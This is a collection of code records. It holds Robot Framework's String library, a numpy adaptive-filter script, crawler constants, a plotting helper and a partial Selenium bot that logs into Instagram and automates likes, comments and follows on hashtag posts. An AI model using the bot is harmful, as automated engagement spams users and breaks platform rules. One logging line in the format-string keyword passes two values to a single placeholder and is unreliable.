''.join(title(token) for token in tokens)\n\n def encode_string_to_bytes(self, string, encoding, errors='strict'):\n \"\"\"Encodes the given Unicode ``string`` to bytes using the given ``encoding``.\n\n ``errors`` argument controls what to do if encoding some characters fails.\n All values accepted by ``encode`` method in Python are valid, but in\n practice the following values are most useful:\n\n - ``strict``: fail if characters cannot be encoded (default)\n - ``ignore``: ignore characters that cannot be encoded\n - ``replace``: replace characters that cannot be encoded with\n a replacement character\n\n Examples:\n | ${bytes} = | Encode String To Bytes | ${string} | UTF-8 |\n | ${bytes} = | Encode String To Bytes | ${string} | ASCII | errors=ignore |\n\n Use `Convert To Bytes` in ``BuiltIn`` if you want to create bytes based\n on character or integer sequences. Use `Decode Bytes To String` if you\n need to convert byte strings to Unicode strings and `Convert To String`\n in ``BuiltIn`` if you need to convert arbitrary objects to Unicode.\n \"\"\"\n return bytes(string.encode(encoding, errors))\n\n def decode_bytes_to_string(self, bytes, encoding, errors='strict'):\n \"\"\"Decodes the given ``bytes`` to a Unicode string using the given ``encoding``.\n\n ``errors`` argument controls what to do if decoding some bytes fails.\n All values accepted by ``decode`` method in Python are valid, but in\n practice the following values are most useful:\n\n - ``strict``: fail if characters cannot be decoded (default)\n - ``ignore``: ignore characters that cannot be decoded\n - ``replace``: replace characters that cannot be decoded with\n a replacement character\n\n Examples:\n | ${string} = | Decode Bytes To String | ${bytes} | UTF-8 |\n | ${string} = | Decode Bytes To String | ${bytes} | ASCII | errors=ignore |\n\n Use `Encode String To Bytes` if you need to convert Unicode strings to\n byte strings, and `Convert To String` in ``BuiltIn`` if you need to\n convert arbitrary objects to Unicode strings.\n \"\"\"\n if is_string(bytes):\n raise TypeError('Cannot decode strings.')\n return bytes.decode(encoding, errors)\n\n def format_string(self, template, *positional, **named):\n \"\"\"Formats a ``template`` using the given ``positional`` and ``named`` arguments.\n\n The template can be either be a string or an absolute path to\n an existing file. In the latter case the file is read and its contents\n are used as the template. If the template file contains non-ASCII\n characters, it must be encoded using UTF-8.\n\n The template is formatted using Python's\n [https://docs.python.org/library/string.html#format-string-syntax|format\n string syntax]. Placeholders are marked using ``{}`` with possible\n field name and format specification inside. Literal curly braces\n can be inserted by doubling them like `{{` and `}}`.\n\n Examples:\n | ${to} = | Format String | To: {} <{}> | ${user} | ${email} |\n | ${to} = | Format String | To: {name} <{email}> | name=${name} | email=${email} |\n | ${to} = | Format String | To: {user.name} <{user.email}> | user=${user} |\n | ${xx} = | Format String | {:*^30} | centered |\n | ${yy} = | Format String | {0:{width}{base}} | ${42} | base=X | width=10 |\n | ${zz} = | Format String | ${CURDIR}/template.txt | positional | named=value |\n\n New in Robot Framework 3.1.\n \"\"\"\n if os.path.isabs(template) and os.path.isfile(template):\n template = template.replace('/', os.sep)\n logger.info('Reading template from file %s.'\n % (template, template), html=True)\n with FileReader(template) as reader:\n template = reader.read()\n return template.format(*positional, **named)\n\n def get_line_count(self, string):\n \"\"\"Returns and logs the number of lines in the given string.\"\"\"\n count = len(string.splitlines())\n logger.info('%d lines' % count)\n return count\n\n def split_to_lines(self, string, start=0, end=None):\n \"\"\"Splits the given string to lines.\n\n It is possible to get only a selection of lines from ``start``\n to ``end`` so that ``start`` index is inclusive and ``end`` is\n exclusive. Line numbering starts from 0, and it is possible to\n use negative indices to refer to lines from the end.\n\n Lines are returned without the newlines. The number of\n returned lines is automatically logged.\n\n Examples:\n | @{lines} = | Split To Lines | ${manylines} | | |\n | @{ignore first} = | Split To Lines | ${manylines} | 1 | |\n | @{ignore last} = | Split To Lines | ${manylines} | | -1 |\n | @{5th to 10th} = | Split To Lines | ${manylines} | 4 | 10 |\n | @{first two} = | Split To Lines | ${manylines} | | 1 |\n | @{last two} = | Split To Lines | ${manylines} | -2 | |\n\n Use `Get Line` if you only need to get a single line.\n \"\"\"\n start = self._convert_to_index(start, 'start')\n end = self._convert_to_index(end, 'end')\n lines = string.splitlines()[start:end]\n logger.info('%d lines returned' % len(lines))\n return lines\n\n def get_line(self, string, line_number):\n \"\"\"Returns the specified line from the given ``string``.\n\n Line numbering starts from 0 and it is possible to use\n negative indices to refer to lines from the end. The line is\n returned without the newline character.\n\n Examples:\n | ${first} = | Get Line | ${string} | 0 |\n | ${2nd last} = | Get Line | ${string} | -2 |\n\n Use `Split To Lines` if all lines are needed.\n \"\"\"\n line_number = self._convert_to_integer(line_number, 'line_number')\n return string.splitlines()[line_number]\n\n def get_lines_containing_string(self, string, pattern, case_insensitive=False):\n \"\"\"Returns lines of the given ``string`` that contain the ``pattern``.\n\n The ``pattern`` is always considered to be a normal string, not a glob\n or regexp pattern. A line matches if the ``pattern`` is found anywhere\n on it.\n\n The match is case-sensitive by default, but giving ``case_insensitive``\n a true value makes it case-insensitive. The value is considered true\n if it is a non-empty string that is not equal to ``false``, ``none`` or\n ``no``. If the value is not a string, its truth value is got directly\n in Python.\n\n Lines are returned as one string catenated back together with\n newlines. Possible trailing newline is never returned. The\n number of matching lines is automatically logged.\n\n Examples:\n | ${lines} = | Get Lines Containing String | ${result} | An example |\n | ${ret} = | Get Lines Containing String | ${ret} | FAIL | case-insensitive |\n\n See `Get Lines Matching Pattern` and `Get Lines Matching Regexp`\n if you need more complex pattern matching.\n \"\"\"\n if is_truthy(case_insensitive):\n pattern = pattern.lower()\n contains = lambda line: pattern in line.lower()\n else:\n contains = lambda line: pattern in line\n return self._get_matching_lines(string, contains)\n\n def get_lines_matching_pattern(self, string, pattern, case_insensitive=False):\n \"\"\"Returns lines of the given ``string`` that match the ``pattern``.\n\n The ``pattern`` is a _glob pattern_ where:\n | ``*`` | matches everything |\n | ``?`` | matches any single character |\n | ``[chars]`` | matches any character inside square brackets (e.g. ``[abc]`` matches either ``a``, ``b`` or ``c``) |\n | ``[!chars]`` | matches any character not inside square brackets |\n\n A line matches only if it matches the ``pattern`` fully.\n\n The match is case-sensitive by default, but giving ``case_insensitive``\n a true value makes it case-insensitive. The value is considered true\n if it is a non-empty string that is not equal to ``false``, ``none`` or\n ``no``. If the value is not a string, its truth value is got directly\n in Python.\n\n Lines are returned as one string catenated back together with\n newlines. Possible trailing newline is never returned. The\n number of matching lines is automatically logged.\n\n Examples:\n | ${lines} = | Get Lines Matching Pattern | ${result} | Wild???? example |\n | ${ret} = | Get Lines Matching Pattern | ${ret} | FAIL: * | case_insensitive=true |\n\n See `Get Lines Matching Regexp` if you need more complex\n patterns and `Get Lines Containing String` if searching\n literal strings is enough.\n \"\"\"\n if is_truthy(case_insensitive):\n pattern = pattern.lower()\n matches = lambda line: fnmatchcase(line.lower(), pattern)\n else:\n matches = lambda line: fnmatchcase(line, pattern)\n return self._get_matching_lines(string, matches)\n\n def get_lines_matching_regexp(self, string, pattern, partial_match=False, flags=None):\n \"\"\"Returns lines of the given ``string`` that match the regexp ``pattern``.\n\n See `BuiltIn.Should Match Regexp` for more information about\n Python regular expression syntax in general and how to use it\n in Robot Framework data in particular.\n\n Lines match only if they match the pattern fully by default, but\n partial matching can be enabled by giving the ``partial_match``\n argument a true value. The value is considered true\n if it is a non-empty string that is not equal to ``false``, ``none`` or\n ``no``. If the value is not a string, its truth value is got directly\n in Python.\n\n If the pattern is empty, it matches only empty lines by default.\n When partial matching is enabled, empty pattern matches all lines.\n\n Possible flags altering how the expression is parsed (e.g. ``re.IGNORECASE``,\n ``re.VERBOSE``) can be given using the ``flags`` argument (e.g.\n ``flags=IGNORECASE | VERBOSE``) or embedded to the pattern (e.g.\n ``(?ix)pattern``).\n\n Lines are returned as one string concatenated back together with\n newlines. Possible trailing newline is never returned. The\n number of matching lines is automatically logged.\n\n Examples:\n | ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\\\\\w{3} example |\n | ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\\\\\w{3} example | partial_match=true |\n | ${ret} = | Get Lines Matching Regexp | ${ret} | (?i)FAIL: .* |\n | ${ret} = | Get Lines Matching Regexp | ${ret} | FAIL: .* | flags=IGNORECASE |\n\n See `Get Lines Matching Pattern` and `Get Lines Containing String` if you\n do not need the full regular expression powers (and complexity).\n\n The ``flags`` argument is new in Robot Framework 6.0.\n \"\"\"\n if is_truthy(partial_match):\n match = re.compile(pattern, flags=parse_re_flags(flags)).search\n else:\n match = re.compile(pattern + '$', flags=parse_re_flags(flags)).match\n return self._get_matching_lines(string, match)\n\n def _get_matching_lines(self, string, matches):\n lines = string.splitlines()\n matching = [line for line in lines if matches(line)]\n logger.info('%d out of %d lines matched' % (len(matching), len(lines)))\n return '\\n'.join(matching)\n\n def get_regexp_matches(self, string, pattern, *groups, flags=None):\n \"\"\"Returns a list of all non-overlapping matches in the given string.\n\n ``string`` is the string to find matches from and ``pattern`` is the\n regular expression. See `BuiltIn.Should Match Regexp` for more\n information about Python regular expression syntax in general and how\n to use it in Robot Framework data in particular.\n\n If no groups are used, the returned list contains full matches. If one\n group is used, the list contains only contents of that group. If\n multiple groups are used, the list contains tuples that contain\n individual group contents. All groups can be given as indexes (starting\n from 1) and named groups also as names.\n\n Possible flags altering how the expression is parsed (e.g. ``re.IGNORECASE``,\n ``re.MULTILINE``) can be given using the ``flags`` argument (e.g.\n ``flags=IGNORECASE | MULTILINE``) or embedded to the pattern (e.g.\n ``(?im)pattern``).\n\n Examples:\n | ${no match} = | Get Regexp Matches | the string | xxx |\n | ${matches} = | Get Regexp Matches | the string | t.. |\n | ${matches} = | Get Regexp Matches | the string | T.. | flags=IGNORECASE |\n | ${one group} = | Get Regexp Matches | the string | t(..) | 1 |\n | ${named group} = | Get Regexp Matches | the string | t(?P..) | name |\n | ${two groups} = | Get Regexp Matches | the string | t(.)(.) | 1 | 2 |\n =>\n | ${no match} = []\n | ${matches} = ['the', 'tri']\n | ${one group} = ['he', 'ri']\n | ${named group} = ['he', 'ri']\n | ${two groups} = [('h', 'e'), ('r', 'i')]\n\n The ``flags`` argument is new in Robot Framework 6.0.\n \"\"\"\n regexp = re.compile(pattern, flags=parse_re_flags(flags))\n groups = [self._parse_group(g) for g in groups]\n return [m.group(*groups) for m in regexp.finditer(string)]\n\n def _parse_group(self, group):\n try:\n return int(group)\n except ValueError:\n return group\n\n def replace_string(self, string, search_for, replace_with, count=-1):\n \"\"\"Replaces ``search_for`` in the given ``string`` with ``replace_with``.\n\n ``search_for`` is used as a literal string. See `Replace String\n Using Regexp` if more powerful pattern matching is needed.\n If you need to just remove a string see `Remove String`.\n\n If the optional argument ``count`` is given, only that many\n occurrences from left are replaced. Negative ``count`` means\n that all occurrences are replaced (default behaviour) and zero\n means that nothing is done.\n\n A modified version of the string is returned and the original\n string is not altered.\n\n Examples:\n | ${str} = | Replace String | Hello, world! | world | tellus |\n | Should Be Equal | ${str} | Hello, tellus! | | |\n | ${str} = | Replace String | Hello, world! | l | ${EMPTY} | count=1 |\n | Should Be Equal | ${str} | Helo, world! | | |\n \"\"\"\n count = self._convert_to_integer(count, 'count')\n return string.replace(search_for, replace_with, count)\n\n def replace_string_using_regexp(self, string, pattern, replace_with, count=-1, flags=None):\n \"\"\"Replaces ``pattern`` in the given ``string`` with ``replace_with``.\n\n This keyword is otherwise identical to `Replace String`, but\n the ``pattern`` to search for is considered to be a regular\n expression. See `BuiltIn.Should Match Regexp` for more\n information about Python regular expression syntax in general\n and how to use it in Robot Framework data in particular.\n\n Possible flags altering how the expression is parsed (e.g. ``re.IGNORECASE``,\n ``re.MULTILINE``) can be given using the ``flags`` argument (e.g.\n ``flags=IGNORECASE | MULTILINE``) or embedded to the pattern (e.g.\n ``(?im)pattern``).\n\n If you need to just remove a string see `Remove String Using Regexp`.\n\n Examples:\n | ${str} = | Replace String Using Regexp | ${str} | 20\\\\\\\\d\\\\\\\\d-\\\\\\\\d\\\\\\\\d-\\\\\\\\d\\\\\\\\d | |\n | ${str} = | Replace String Using Regexp | ${str} | (Hello|Hi) | ${EMPTY} | count=1 |\n\n The ``flags`` argument is new in Robot Framework 6.0.\n \"\"\"\n count = self._convert_to_integer(count, 'count')\n # re.sub handles 0 and negative counts differently than string.replace\n if count == 0:\n return string\n return re.sub(pattern, replace_with, string, max(count, 0), flags=parse_re_flags(flags))\n\n def remove_string(self, string, *removables):\n \"\"\"Removes all ``removables`` from the given ``string``.\n\n ``removables`` are used as literal strings. Each removable will be\n matched to a temporary string from which preceding removables have\n been already removed. See second example below.\n\n Use `Remove String Using Regexp` if more powerful pattern matching is\n needed. If only a certain number of matches should be removed,\n `Replace String` or `Replace String Using Regexp` can be used.\n\n A modified version of the string is returned and the original\n string is not altered.\n\n Examples:\n | ${str} = | Remove String | Robot Framework | work |\n | Should Be Equal | ${str} | Robot Frame |\n | ${str} = | Remove String | Robot Framework | o | bt |\n | Should Be Equal | ${str} | R Framewrk |\n \"\"\"\n for removable in removables:\n string = self.replace_string(string, removable, '')\n return string\n\n def remove_string_using_regexp(self, string, *patterns, flags=None):\n \"\"\"Removes ``patterns`` from the given ``string``.\n\n This keyword is otherwise identical to `Remove String`, but\n the ``patterns`` to search for are considered to be a regular\n expression. See `Replace String Using Regexp` for more information\n about the regular expression syntax. That keyword can also be\n used if there is a need to remove only a certain number of\n occurrences.\n\n Possible flags altering how the expression is parsed (e.g. ``re.IGNORECASE``,\n ``re.MULTILINE``) can be given using the ``flags`` argument (e.g.\n ``flags=IGNORECASE | MULTILINE``) or embedded to the pattern (e.g.\n ``(?im)pattern``).\n\n The ``flags`` argument is new in Robot Framework 6.0.\n \"\"\"\n for pattern in patterns:\n string = self.replace_string_using_regexp(string, pattern, '', flags=flags)\n return string\n\n @keyword(types=None)\n def split_string(self, string, separator=None, max_split=-1):\n \"\"\"Splits the ``string`` using ``separator`` as a delimiter string.\n\n If a ``separator`` is not given, any whitespace string is a\n separator. In that case also possible consecutive whitespace\n as well as leading and trailing whitespace is ignored.\n\n Split words are returned as a list. If the optional\n ``max_split`` is given, at most ``max_split`` splits are done, and\n the returned list will have maximum ``max_split + 1`` elements.\n\n Examples:\n | @{words} = | Split String | ${string} |\n | @{words} = | Split String | ${string} | ,${SPACE} |\n | ${pre} | ${post} = | Split String | ${string} | :: | 1 |\n\n See `Split String From Right` if you want to start splitting\n from right, and `Fetch From Left` and `Fetch From Right` if\n you only want to get first/last part of the string.\n \"\"\"\n if separator == '':\n separator = None\n max_split = self._convert_to_integer(max_split, 'max_split')\n return string.split(separator, max_split)\n\n @keyword(types=None)\n def split_string_from_right(self, string, separator=None, max_split=-1):\n \"\"\"Splits the ``string`` using ``separator`` starting from right.\n\n Same as `Split String`, but splitting is started from right. This has\n an effect only when ``max_split`` is given.\n\n Examples:\n | ${first} | ${rest} = | Split String | ${string} | - | 1 |\n | ${rest} | ${last} = | Split String From Right | ${string} | - | 1 |\n \"\"\"\n if separator == '':\n separator = None\n max_split = self._convert_to_integer(max_split, 'max_split')\n return string.rsplit(separator, max_split)\n\n def split_string_to_characters(self, string):\n \"\"\"Splits the given ``string`` to characters.\n\n Example:\n | @{characters} = | Split String To Characters | ${string} |\n \"\"\"\n return list(string)\n\n def fetch_from_left(self, string, marker):\n \"\"\"Returns contents of the ``string`` before the first occurrence of ``marker``.\n\n If the ``marker`` is not found, whole string is returned.\n\n See also `Fetch From Right`, `Split String` and `Split String\n From Right`.\n \"\"\"\n return string.split(marker)[0]\n\n def fetch_from_right(self, string, marker):\n \"\"\"Returns contents of the ``string`` after the last occurrence of ``marker``.\n\n If the ``marker`` is not found, whole string is returned.\n\n See also `Fetch From Left`, `Split String` and `Split String\n From Right`.\n \"\"\"\n return string.split(marker)[-1]\n\n def generate_random_string(self, length=8, chars='[LETTERS][NUMBERS]'):\n \"\"\"Generates a string with a desired ``length`` from the given ``chars``.\n\n ``length`` can be given as a number, a string representation of a number,\n or as a range of numbers, such as ``5-10``. When a range of values is given\n the range will be selected by random within the range.\n\n The population sequence ``chars`` contains the characters to use\n when generating the random string. It can contain any\n characters, and it is possible to use special markers\n explained in the table below:\n\n | = Marker = | = Explanation = |\n | ``[LOWER]`` | Lowercase ASCII characters from ``a`` to ``z``. |\n | ``[UPPER]`` | Uppercase ASCII characters from ``A`` to ``Z``. |\n | ``[LETTERS]`` | Lowercase and uppercase ASCII characters. |\n | ``[NUMBERS]`` | Numbers from 0 to 9. |\n\n Examples:\n | ${ret} = | Generate Random String |\n | ${low} = | Generate Random String | 12 | [LOWER] |\n | ${bin} = | Generate Random String | 8 | 01 |\n | ${hex} = | Generate Random String | 4 | [NUMBERS]abcdef |\n | ${rnd} = | Generate Random String | 5-10 | # Generates a string 5 to 10 characters long |\n\n Giving ``length`` as a range of values is new in Robot Framework 5.0.\n \"\"\"\n if length == '':\n length = 8\n if isinstance(length, str) and re.match(r'^\\d+-\\d+$', length):\n min_length, max_length = length.split('-')\n length = randint(self._convert_to_integer(min_length, \"length\"),\n self._convert_to_integer(max_length, \"length\"))\n else:\n length = self._convert_to_integer(length, 'length')\n for name, value in [('[LOWER]', ascii_lowercase),\n ('[UPPER]', ascii_uppercase),\n ('[LETTERS]', ascii_lowercase + ascii_uppercase),\n ('[NUMBERS]', digits)]:\n chars = chars.replace(name, value)\n maxi = len(chars) - 1\n return ''.join(chars[randint(0, maxi)] for _ in range(length))\n\n def get_substring(self, string, start, end=None):\n \"\"\"Returns a substring from ``start`` index to ``end`` index.\n\n The ``start`` index is inclusive and ``end`` is exclusive.\n Indexing starts from 0, and it is possible to use\n negative indices to refer to characters from the end.\n\n Examples:\n | ${ignore first} = | Get Substring | ${string} | 1 | |\n | ${ignore last} = | Get Substring | ${string} | | -1 |\n | ${5th to 10th} = | Get Substring | ${string} | 4 | 10 |\n | ${first two} = | Get Substring | ${string} | | 1 |\n | ${last two} = | Get Substring | ${string} | -2 | |\n \"\"\"\n start = self._convert_to_index(start, 'start')\n end = self._convert_to_index(end, 'end')\n return string[start:end]\n\n @keyword(types=None)\n def strip_string(self, string, mode='both', characters=None):\n \"\"\"Remove leading and/or trailing whitespaces from the given string.\n\n ``mode`` is either ``left`` to remove leading characters, ``right`` to\n remove trailing characters, ``both`` (default) to remove the\n characters from both sides of the string or ``none`` to return the\n unmodified string.\n\n If the optional ``characters`` is given, it must be a string and the\n characters in the string will be stripped in the string. Please note,\n that this is not a substring to be removed but a list of characters,\n see the example below.\n\n Examples:\n | ${stripped}= | Strip String | ${SPACE}Hello${SPACE} | |\n | Should Be Equal | ${stripped} | Hello | |\n | ${stripped}= | Strip String | ${SPACE}Hello${SPACE} | mode=left |\n | Should Be Equal | ${stripped} | Hello${SPACE} | |\n | ${stripped}= | Strip String | aabaHelloeee | characters=abe |\n | Should Be Equal | ${stripped} | Hello | |\n \"\"\"\n try:\n method = {'BOTH': string.strip,\n 'LEFT': string.lstrip,\n 'RIGHT': string.rstrip,\n 'NONE': lambda characters: string}[mode.upper()]\n except KeyError:\n raise ValueError(\"Invalid mode '%s'.\" % mode)\n return method(characters)\n\n def should_be_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is not a string.\n\n The default error message can be overridden with the optional ``msg`` argument.\n \"\"\"\n if not is_string(item):\n self._fail(msg, \"'%s' is %s, not a string.\", item, type_name(item))\n\n def should_not_be_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is a string.\n\n The default error message can be overridden with the optional ``msg`` argument.\n \"\"\"\n if is_string(item):\n self._fail(msg, \"'%s' is a string.\", item)\n\n def should_be_unicode_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is not a Unicode string.\n\n On Python 3 this keyword behaves exactly the same way `Should Be String`.\n That keyword should be used instead and this keyword will be deprecated.\n \"\"\"\n if not is_string(item):\n self._fail(msg, \"'%s' is not a Unicode string.\", item)\n\n def should_be_byte_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is not a byte string.\n\n Use `Should Be String` if you want to verify the ``item`` is a string.\n\n The default error message can be overridden with the optional ``msg`` argument.\n \"\"\"\n if not is_bytes(item):\n self._fail(msg, \"'%s' is not a byte string.\", item)\n\n def should_be_lower_case(self, string, msg=None):\n \"\"\"Fails if the given ``string`` is not in lower case.\n\n For example, ``'string'`` and ``'with specials!'`` would pass, and\n ``'String'``, ``''`` and ``' '`` would fail.\n\n The default error message can be overridden with the optional\n ``msg`` argument.\n\n See also `Should Be Upper Case` and `Should Be Title Case`.\n \"\"\"\n if not string.islower():\n self._fail(msg, \"'%s' is not lower case.\", string)\n\n def should_be_upper_case(self, string, msg=None):\n \"\"\"Fails if the given ``string`` is not in upper case.\n\n For example, ``'STRING'`` and ``'WITH SPECIALS!'`` would pass, and\n ``'String'``, ``''`` and ``' '`` would fail.\n\n The default error message can be overridden with the optional\n ``msg`` argument.\n\n See also `Should Be Title Case` and `Should Be Lower Case`.\n \"\"\"\n if not string.isupper():\n self._fail(msg, \"'%s' is not upper case.\", string)\n\n @keyword(types=None)\n def should_be_title_case(self, string, msg=None, exclude=None):\n \"\"\"Fails if given ``string`` is not title.\n\n ``string`` is a title cased string if there is at least one upper case\n letter in each word.\n\n For example, ``'This Is Title'`` and ``'OK, Give Me My iPhone'``\n would pass. ``'all words lower'`` and ``'Word In lower'`` would fail.\n\n This logic changed in Robot Framework 4.0 to be compatible with\n `Convert to Title Case`. See `Convert to Title Case` for title case\n algorithm and reasoning.\n\n The default error message can be overridden with the optional\n ``msg`` argument.\n\n Words can be explicitly excluded with the optional ``exclude`` argument.\n\n Explicitly excluded words can be given as a list or as a string with\n words separated by a comma and an optional space. Excluded words are\n actually considered to be regular expression patterns, so it is\n possible to use something like \"example[.!?]?\" to match the word\n \"example\" on it own and also if followed by \".\", \"!\" or \"?\".\n See `BuiltIn.Should Match Regexp` for more information about Python\n regular expression syntax in general and how to use it in Robot\n Framework data in particular.\n\n See also `Should Be Upper Case` and `Should Be Lower Case`.\n \"\"\"\n if string != self.convert_to_title_case(string, exclude):\n self._fail(msg, \"'%s' is not title case.\", string)\n\n def _convert_to_index(self, value, name):\n if value == '':\n return 0\n if value is None:\n return None\n return self._convert_to_integer(value, name)\n\n def _convert_to_integer(self, value, name):\n try:\n return int(value)\n except ValueError:\n raise ValueError(\"Cannot convert '%s' argument '%s' to an integer.\"\n % (name, value))\n\n def _fail(self, message, default_template, *items):\n if not message:\n message = default_template % tuple(safe_str(item) for item in items)\n raise AssertionError(message)\n","repo_name":"robotframework/robotframework","sub_path":"src/robot/libraries/String.py","file_name":"String.py","file_ext":"py","file_size_in_byte":35484,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"13026562026","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\ndef autostep(inp, out, nbIn, nFir):\n nbPts = min(inp.shape[1], len(out))\n\n inAcc = np.zeros((nbIn, nFir))\n outAcc = np.zeros(nFir)\n\n e = np.zeros(nbPts)\n kappa = 0.027655\n gamma = 0.22104\n\n mu = np.ones((nbIn, nFir)) / (nFir * nbIn + 1)\n h = np.zeros((nbIn, nFir))\n w = np.zeros((nbIn, nFir))\n v = np.zeros((nbIn, nFir))\n\n for n in tqdm(np.arange(nbPts)):\n inAcc = np.roll(inAcc, 1, axis=1)\n inAcc[:, 1] = inp[:, n]\n\n outAcc = np.roll(outAcc, -1)\n outAcc[-1] = out[n]\n\n e[n] = outAcc[-1] - sum(sum(h * inAcc))\n\n v = np.maximum(abs(e[n] * inAcc * w), v + gamma * mu * abs(inAcc)**2 * (abs(e[n] * inAcc * w) - v))\n\n slice_v0 = (v == 0)\n v[slice_v0] = 1\n alpha = np.log(mu) + kappa * e[n] * inAcc * w / v\n alpha[slice_v0] = np.log(mu[slice_v0])\n\n mu = np.exp(alpha)\n mu = mu / np.maximum(mu * inAcc**2, 1)\n\n h = h + mu * e[n] * inAcc\n\n w = (1 - mu * abs(inAcc)**2) * w + mu * e[n] * inAcc\n\n return h, e\n\n\nif __name__ == \"__main__\":\n h1 = np.zeros(100)\n h2 = np.zeros(100)\n\n h1[20] = 0.9\n h2[30] = 0.8\n\n x = np.zeros((2, 100000))\n x[0,:] = np.random.normal(0, 1, size=100000)\n x[1,:] = np.random.normal(0, 1, size=100000)\n\n y = np.convolve(h1, x[0,:]) + np.convolve(h2, x[1,:])\n\n h, e = autostep(x, y, 2, 100)\n\n plt.figure()\n plt.plot(h[1,:])\n plt.show()\n\n","repo_name":"guipag/These_autostep","sub_path":"autostep.py","file_name":"autostep.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24300844381","text":"# -*- coding: utf-8 -*-\n\ndomain='http://www.passetoncode.fr'\n\nbase_item='/panneaux-de-signalisation/'\n\nbase_sign=base_item+'panneaux/'\n\nsigns=[\n\t\t'agglomeration',\n\t\t'danger',\n\t\t'direction',\n\t\t'indication',\n\t\t'interdiction',\n\t\t'localisation',\n\t\t'obligation',\n\t\t'priorites',\n\t\t'travaux',\n\t\t'zone'\n\t]\n\nothers=[\n\t'cartouches',\n\t'ideogrammes',\n\t'panonceaux',\n\t'symboles',\n\t'balises'\t\n] \n\n","repo_name":"oliviermarin/ptc-crawler","sub_path":"ptc_crawler/ptc_crawler/constants/ptc_constants.py","file_name":"ptc_constants.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38593021431","text":"from matplotlib import pyplot as plt\n\ndef get_ab(tsne_scalars):\n if tsne_scalars:\n return 1, 1\n return None, None\n\ndef make_plot(embedding, labels, save_path=None, show_plot=False):\n plt.scatter(embedding[:, 0], embedding[:, 1], c=labels, s=0.35, alpha=0.8)\n plt.tick_params(\n axis='x',\n which='both',\n bottom=False,\n top=False,\n labelbottom=False\n )\n plt.tick_params(\n axis='y',\n which='both',\n left=False,\n right=False,\n labelleft=False\n )\n if save_path is not None:\n plt.savefig(save_path)\n if show_plot:\n plt.show()\n\n plt.close()\n","repo_name":"Andrew-Draganov/GiDR-DUN","sub_path":"GDR/experiment_utils/general_utils.py","file_name":"general_utils.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"3474955841","text":"# selenium 임포트\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport sys\nimport re\n\n\n# chrome driver 연결 및 instagram 로그인 접속 후 해시태그 검색\n\ndriver = webdriver.Chrome(\"C:/Users/lsj40/Documents/GitHub/InstagramBot/chromedriver/chromedriver88.exe\")\ndriver.implicitly_wait(200)\ndriver.get(\"https://www.instagram.com/\") # 인스타그램 접속\n\nusername_box_check = WebDriverWait(driver, 10).until(EC.presence_of_element_located\\\n((By.XPATH, '//*[@id=\"loginForm\"]/div/div[1]/div/label/input')))\n################## facebook 버전 로그인\n# driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[5]/button')[0].click() # 페이스북 로그인\n\n# username_box = driver.find_elements_by_xpath('//*[@id=\"email\"]')[0]\n# username_box.send_keys(\"ID\") #페이스북 ID\n\n# username_box = driver.find_elements_by_xpath('//*[@id=\"pass\"]')[0]\n# username_box.send_keys(\"PW\") #페이스북 PW\n\n# login_button = driver.find_elements_by_xpath('//*[@id=\"loginbutton\"]')[0]\n# login_button.click() # 로그인 버튼\n###############\n\n\n######### 인스타 전용 계정 로그인\n\nusername_box = driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[1]/div/label/input')[0]\nusername_box.send_keys(\"ID\")\n\nusername_box = driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[2]/div/label/input')[0]\nusername_box.send_keys(\"PW\")\n\nlogin_button = driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[3]/button')[0]\nlogin_button.click() # 로그인 버튼\n\n\n\nusername_box_check = WebDriverWait(driver, 10).until(EC.presence_of_element_located\\\n((By.XPATH, '//section/nav/div[2]/div/div/div[2]/input')))\n\ntest = driver.find_elements_by_xpath('//div[4]/div/div/div/div[3]/button[2]')[0]\nif test: # update 뜨는 팝업 창 -> 다음에 하기 버튼 클릭\n test.click()\n\nsearch_hashtag = driver.find_elements_by_xpath('//section/nav/div[2]/div/div/div[2]/input')[0]\nsearch_hashtag.send_keys(\"#코딩\") # 해쉬태그 검색\n\n\ntime.sleep(3)\nsearch_hashtag.send_keys(Keys.ENTER)\ntime.sleep(1)\nsearch_hashtag.send_keys(Keys.ENTER) # 해쉬태그 검색 결과창으로 이동\n\ncurrent_url = driver.current_url\n\n\n# 좋아요, 댓글 팔로우 기능\n\ncount = 0\ncount_ = 0\none = 1\nfinish_like = False\n\nbool_ = True\nbool_following = True\n\ndef isHangul(text): # 한글 구별 위한 함수\n #Check the Python Version\n pyVer3 = sys.version_info >= (3, 0)\n\n if pyVer3 : # for Ver 3 or later\n encText = text\n \n\n hanCount = len(re.findall(u'[\\u3130-\\u318F\\uAC00-\\uD7A3]+', encText))\n return hanCount > 0\n\n\ndef like_comment(): # 좋아요 & 댓글 함수\n\n global count\n global one\n global finish_like\n\n print(count)\n if count == 30:\n \n one = 1\n sys.exit('설정한 횟수가 끝났습니다.')\n # 또는 팔로우 목록으로 이동하여 팔로워와 팔로우 차이 많이 나는 팔로워 제거하기..\n\n ################################# 첫번째 게시물 선택\n if finish_like == False and count != 30:\n if one == 1:\n first_post = driver.find_elements_by_xpath('//div[1]/div/div/div[1]/div[1]/a')[0]\n first_post.click()\n one = 2\n\n ################################\n time.sleep(5)\n \n ############################## 좋아요 \n like_action = driver.find_elements_by_xpath('/html/body/div[5]/div[2]/div/article/div[3]/section[1]/span[1]/button')[0]\n\n like_path = 